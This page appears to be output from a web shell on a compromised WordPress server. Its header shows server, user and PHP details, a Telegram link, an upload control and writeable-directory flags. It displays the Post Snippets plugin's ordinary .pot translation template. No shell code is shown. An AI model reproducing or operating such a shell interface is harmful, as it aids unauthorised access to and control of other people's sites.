https://t.me/RX1948
Server : Apache
System : Linux s1230 5.15.0-139-generic #149~20.04.1 SMP Tue Jul 14 11:21:49 UTC 2026 x86_64
User : p141464 ( 418825)
PHP Version : 7.4.33.12
Disable Function : NONE
Directory :  /html/relaunch-kmu/wp-content/plugins/post-snippets/lang/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //html/relaunch-kmu/wp-content/plugins/post-snippets/lang/post-snippets.pot
# SOME DESCRIPTIVE TITLE.
# Copyright (C) YEAR THE PACKAGE'S COPYRIGHT HOLDER
# This file is distributed under the same license as the PACKAGE package.
# FIRST AUTHOR <EMAIL@ADDRESS>, YEAR.
#
#, fuzzy
msgid ""
msgstr ""
"Project-Id-Version: PACKAGE VERSION\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2016-02-06 08:29+0000\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n"
"Last-Translator: FULL NAME <EMAIL@ADDRESS>\n"
"Language-Team: LANGUAGE <LL@li.org>\n"
"Language: \n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=CHARSET\n"
"Content-Transfer-Encoding: 8bit\n"

#: views/admin_snippets.php:8 views/admin_snippets.php:17
#: views/help/usage.php:4
msgid "Title"
msgstr ""

#: views/admin_snippets.php:9 views/admin_snippets.php:18
#: views/help/usage.php:10 src/PostSnippets/Admin.php:445
msgid "Variables"
msgstr ""

#: views/admin_snippets.php:10 views/admin_snippets.php:19
#: views/help/usage.php:21 src/PostSnippets/Admin.php:464
msgid "Snippet"
msgstr ""

#: views/admin_snippets.php:44 views/help/usage.php:41
msgid "Shortcode"
msgstr ""

#: views/admin_snippets.php:51 views/help/usage.php:54
msgid "PHP Code"
msgstr ""

#: views/admin_snippets.php:65 views/help/usage.php:35
msgid "Description"
msgstr ""

#: views/admin_snippets.php:82
msgid "Update Snippets"
msgstr ""

#: views/admin_snippets.php:83
msgid "Add New Snippet"
msgstr ""

#: views/admin_snippets.php:84
msgid "Delete Selected"
msgstr ""

#: views/jquery-ui-dialog.php:67
msgid "This snippet is insert only, no variables defined."
msgstr ""

#: views/help/advanced.php:1 src/PostSnippets/Help.php:73
msgid "Advanced"
msgstr ""

#: views/help/advanced.php:1 views/help/filters.php:1
msgid "for developers"
msgstr ""

#: views/help/advanced.php:15
msgid ""
"You can retrieve a Post Snippet directly from PHP, in a theme for instance, "
"by using the PostSnippets::getSnippet() method."
msgstr ""

#: views/help/advanced.php:18 views/help/usage.php:1
#: src/PostSnippets/Help.php:50
msgid "Usage"
msgstr ""

#: views/help/advanced.php:24
msgid "Parameters"
msgstr ""

#: views/help/advanced.php:27
msgid "(string) (required) The name of the snippet to retrieve."
msgstr ""

#: views/help/advanced.php:30
msgid ""
"(string) The variables to pass to the snippet, formatted as a query string."
msgstr ""

#: views/help/advanced.php:34 views/help/usage.php:16 views/help/usage.php:26
msgid "Example"
msgstr ""

#: views/help/filters.php:1 src/PostSnippets/Help.php:80
msgid "Filters"
msgstr ""

#: views/help/filters.php:3
msgid "The following filters are available for hooking into the plugin:"
msgstr ""

#: views/help/filters.php:6
msgid ""
"Modify snippets and related data before the imported file populates the "
"snippets."
msgstr ""

#: views/help/filters.php:7
msgid "Modify snippets and related data before the export file is created."
msgstr ""

#: views/help/filters.php:8
msgid ""
"Modify the array of snippets that are used as the snippet list for the "
"jQuery UI dialog in the edit post screen."
msgstr ""

#: views/help/filters.php:11
msgid "Examples"
msgstr ""

#: views/help/php.php:4
msgid ""
"Snippets defined as shortcodes can optionally also be evaluated as PHP Code "
"by enabling the PHP checkbox. PHP snippets is only available when treating "
"the snippet as a shortcode."
msgstr ""

#: views/help/php.php:8
msgid "Check this image for an example PHP snippet:"
msgstr ""

#: views/help/php.php:14
msgid ""
"With a snippet defined like the one above, you can call it with its "
"shortcode definition in a post. Let's pretend that the example snippet is "
"named phpcode and have one variable defined loop_me, then it would be called "
"like this from a post:"
msgstr ""

#: views/help/php.php:20
msgid ""
"When the shortcode is executed the loop_me variable will be replaced with "
"the string supplied in the shortcode and then the PHP code will be "
"evaluated. (Outputting the string five times in this case. Wow!)"
msgstr ""

#: views/help/php.php:24
msgid ""
"Note the evaluation order, any snippet variables will be replaced before the "
"snippet is evaluated as PHP code. Also note that a PHP snippet don't need to "
"be wrapped in &lt;?php #code; ?&gt;."
msgstr ""

#: views/help/post.php:1
msgid "The Post Editor"
msgstr ""

#: views/help/post.php:6
msgid ""
"With your snippets set up, you'll find a new button in your post editor "
"(circled in the image above), which you can click to open the Post Snippet "
"window to insert one of your snippets in your post."
msgstr ""

#: views/help/post.php:12
msgid ""
"When you click this button, you get a window with all your available "
"snippets. Each snippet has its own tab in the Post Snippet window, so you "
"can select which snippet to insert. If you have set up custom variables for "
"the snippet, you can now enter the values for these variables before "
"clicking insert and they will be inserted in the correct places in the "
"snippet string."
msgstr ""

#: views/help/sidebar.php:2
msgid "Related:"
msgstr ""

#: views/help/sidebar.php:6
msgid "Support Forums"
msgstr ""

#: views/help/sidebar.php:10
msgid "GitHub Repository"
msgstr ""

#: views/help/sidebar.php:14
msgid "Donate"
msgstr ""

#: views/help/usage.php:6
msgid ""
"Give the snippet a title that helps you identify it in the post editor. This "
"also becomes the name of the shortcode if you enable that option."
msgstr ""

#: views/help/usage.php:12
msgid ""
"A comma separated list of custom variables you can reference in your "
"snippet. A variable can also be assigned a default value that will be used "
"in the insert window by using the equal sign, variable=default."
msgstr ""

#: views/help/usage.php:23
msgid ""
"This is the block of text, HTML or PHP to insert in the post or as a "
"shortcode. If you have entered predefined variables you can reference them "
"from the snippet by enclosing them in {} brackets."
msgstr ""

#: views/help/usage.php:27
msgid ""
"To reference the variables in the example above, you would enter {url} and "
"{name}. So if you enter this snippet:"
msgstr ""

#: views/help/usage.php:28
msgid "So if you enter this snippet:"
msgstr ""

#: views/help/usage.php:32
msgid ""
"You will get the option to replace url and name on insert if they are "
"defined as variables."
msgstr ""

#: views/help/usage.php:37
msgid ""
"An optional description for the Snippet. If filled out, the description will "
"be displayed in the snippets insert window in the post editor."
msgstr ""

#: views/help/usage.php:43
msgid ""
"When enabling the shortcode checkbox, the snippet is no longer inserted "
"directly but instead inserted as a shortcode. The obvious advantage of this "
"is of course that you can insert a block of text or code in many places on "
"the site, and update the content from one single place."
msgstr ""

#: views/help/usage.php:47
msgid ""
"The name to use the shortcode is the same as the title of the snippet "
"(spaces are not allowed). When inserting a shortcode snippet, the shortcode "
"and not the content will be inserted in the post."
msgstr ""

#: views/help/usage.php:51
msgid ""
"If you enclose the shortcode in your posts, you can access the enclosed "
"content by using the variable {content} in your snippet. The {content} "
"variable is reserved, so don't use it in the variables field."
msgstr ""

#: views/help/usage.php:56
msgid "See the dedicated help section for information about PHP shortcodes."
msgstr ""

#: views/help/usage.php:61
#, php-format
msgid ""
"Before the shortcode is outputted, it can optionally be formatted with %s, "
"to transform quotes to smart quotes, apostrophes, dashes, ellipses, the "
"trademark symbol, and the multiplication symbol."
msgstr ""

#: src/PostSnippets/Admin.php:101
msgid "Invalid shortcode name"
msgstr ""

#: src/PostSnippets/Admin.php:137
msgid "Settings"
msgstr ""

#: src/PostSnippets/Admin.php:178
msgid "A snippet named Untitled has been added."
msgstr ""

#: src/PostSnippets/Admin.php:198
msgid "Nothing selected to delete."
msgstr ""

#: src/PostSnippets/Admin.php:214
msgid "Selected snippets have been deleted."
msgstr ""

#: src/PostSnippets/Admin.php:249
msgid "Snippets have been updated."
msgstr ""

#: src/PostSnippets/Admin.php:330
msgid "Manage Snippets"
msgstr ""

#: src/PostSnippets/Admin.php:331 src/PostSnippets/Admin.php:461
msgid "Options"
msgstr ""

#: src/PostSnippets/Admin.php:332 src/PostSnippets/Admin.php:389
msgid "Import/Export"
msgstr ""

#: src/PostSnippets/Admin.php:341
msgid "Use the help dropdown button for additional information."
msgstr ""

#: src/PostSnippets/Admin.php:390
msgid "Export"
msgstr ""

#: src/PostSnippets/Admin.php:393
msgid "Export your snippets for backup or to import them on another site."
msgstr ""

#: src/PostSnippets/Admin.php:395
msgid "Export Snippets"
msgstr ""

#: src/PostSnippets/Admin.php:418
msgid ""
"This is an overview of all snippets defined for this site. These snippets "
"are inserted into posts from the post editor using the Post Snippets button. "
"You can choose to see the snippets here as-is or as they are actually "
"rendered on the website. Enabling rendered snippets for this overview might "
"look strange if the snippet have dependencies on variables, CSS or other "
"parameters only available on the frontend. If that is the case it is "
"recommended to keep this option disabled."
msgstr ""

#: src/PostSnippets/Admin.php:428
msgid "Display rendered snippets"
msgstr ""

#: src/PostSnippets/Admin.php:429
msgid "Update"
msgstr ""

#: src/PostSnippets/Admin.php:499
msgid "General"
msgstr ""

#: src/PostSnippets/Admin.php:506
msgid "Exclude from Custom Editors"
msgstr ""

#: src/PostSnippets/Admin.php:513
msgid ""
"Checking this only includes Post Snippets on standard WordPress post editing "
"screens."
msgstr ""

#: src/PostSnippets/Help.php:57
msgid "Post Editor"
msgstr ""

#: src/PostSnippets/Help.php:65
msgid "PHP"
msgstr ""

#: src/PostSnippets/ImportExport.php:38
msgid "Error: "
msgstr ""

#: src/PostSnippets/ImportExport.php:61
msgid "Import"
msgstr ""

#: src/PostSnippets/ImportExport.php:67
msgid ""
"Import snippets from a post-snippets-export.zip file. Importing overwrites "
"any existing snippets."
msgstr ""

#: src/PostSnippets/ImportExport.php:74
msgid "Import Snippets"
msgstr ""

#: src/PostSnippets/ImportExport.php:113
msgid "Snippets successfully imported."
msgstr ""

#: src/PostSnippets/ImportExport.php:118 src/PostSnippets/ImportExport.php:127
#: src/PostSnippets/ImportExport.php:133
msgid "Snippets could not be imported:"
msgstr ""

#: src/PostSnippets/ImportExport.php:120
msgid "Unzipping failed."
msgstr ""

#: src/PostSnippets/ImportExport.php:135
msgid "Upload failed."
msgstr ""

https://t.me/RX1948 - 2025